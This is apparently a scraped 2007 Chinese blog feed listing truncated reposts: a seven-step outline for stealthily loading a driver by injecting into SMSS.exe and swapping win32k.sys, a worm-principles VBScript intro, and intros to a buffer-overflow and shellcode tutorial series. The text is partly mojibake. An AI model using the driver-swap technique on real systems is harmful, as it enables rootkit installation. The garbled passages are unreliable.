无ȝ驱动加蝲?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/29/171537.html009009Sat, 29 Dec 2007 06:59:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/29/171537.htmlhttp://www.aygfsteel.com/baicker/comments/171537.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/29/171537.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171537.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171537.html?k3的系l下ZwSetSystemInformation止了用h式下加蝲驱动Q只允许SMSS.exe加蝲win32k.sys。于是我们可以利用一下这个特点:
1. 注入SMSS.EXE
2. 打开SeLoadDriverPrivilege权限
3. 把原始的win32k.sys改名
4. 复制我们的驱动到\systemroot\system32?
5. 在SMSS.EXE中加载\\SystemRoot\\System32\\win32k.sys
6. 把\\SystemRoot\\System32\\win32k.sys改名
7. 把原始的win32k.sys文g改名改回?
..............
  阅读全文

009 2007-12-29 14:59 发表评论
]]>
实例解析蠕虫病毒的原?ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171227.html009009Fri, 28 Dec 2007 07:44:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171227.htmlhttp://www.aygfsteel.com/baicker/comments/171227.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171227.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/171227.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171227.html
  我们以普通的VB脚本Z来看看:
JavaScript代码

1. Set objFs=CreateObject ("Scripting.FileSystemObject")
2. '创徏一个文件系l对?
3. objFs.CreateTextFile ("C:\virus.txt", 1)
4. '通过文gpȝ对象的方法创Z一个TXT文g?
.....................
  阅读全文

009 2007-12-28 15:44 发表评论
]]>
软g漏洞分析入门[初shellcode_定位~冲区](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171225.html009009Fri, 28 Dec 2007 07:41:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171225.htmlhttp://www.aygfsteel.com/baicker/comments/171225.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171225.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171225.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171225.html
另外在今天开始之前,我顺便说一下后面的教学计划Q?

我会再用3?ơ的讲来阐qshellcode技术,保大家能够在比较简单的漏洞场景下实现通用、稳定的溢出利用E序QexploitQ?
..........
  阅读全文

009 2007-12-28 15:41 发表评论
]]>
软g漏洞分析入门[初栈溢出D_植入L代码](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171222.html009009Fri, 28 Dec 2007 07:40:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171222.htmlhttp://www.aygfsteel.com/baicker/comments/171222.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171222.html#Feedback1http://www.aygfsteel.com/baicker/comments/commentRss/171222.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171222.html
如果您顺利的学完了前?讲的内容Qƈ成功的完成了W?讲和W?讲中的实验,那么今天误我来一h战一下劫持有漏洞的进E,q向其植入恶意代码的实验Q相信您成功完成q个实验后,学习的兴和自信心都会暴增?

开始之前,先简要的回答一下前几讲跟脓中提出的问题

代码~译头文g问题Q可能是个h习惯问题Q哪怕几行长的程序我也会丢到project里去buildQ而不是用clQ所以没有注意细节。如果你们嫌ȝQ不如和我一Lproject来buildQ应该没有问题的。否则的话,实验用的E序实在太简单了Q这么一点小问题自己决绝吧。另外,看到几个同学说ؓ了实验,专门恢复了古老的VC6.0Q我也感动不已啊Q呵c?
...............
  阅读全文

009 2007-12-28 15:40 发表评论
]]>
软g漏洞分析入门[初栈溢出C_修改E序程](ZT)http://www.aygfsteel.com/baicker/archive/2007/12/28/171221.html009009Fri, 28 Dec 2007 07:39:00 GMThttp://www.aygfsteel.com/baicker/archive/2007/12/28/171221.htmlhttp://www.aygfsteel.com/baicker/comments/171221.htmlhttp://www.aygfsteel.com/baicker/archive/2007/12/28/171221.html#Feedback0http://www.aygfsteel.com/baicker/comments/commentRss/171221.htmlhttp://www.aygfsteel.com/baicker/services/trackbacks/171221.html
信息安全技术是一个对技术性要求极高的领域Q除了扎实的计算机理论基外、更重要的是优秀的动手实践能力。在我看来,不懂二进制就无从谈v安全技术?

~冲区溢出的概念我若q年前已l了然于胸,不就是个返回地址把CPU指到~冲区的shellcodeM。然而当我开始动手实늚时候,才发现实际中的情况远q比原理复杂?
................
  阅读全文

009 2007-12-28 15:39 发表评论
]]>
վ֩ģ壺 | | | ų| Դ| ³ɽ| | | | | | | | | Ԫ| ҵ| ̫| ɽ| | פ| | | | º| û| ׶| | Ӧñر| | | | | ƺ| | лͨ| | | ͨ| | | |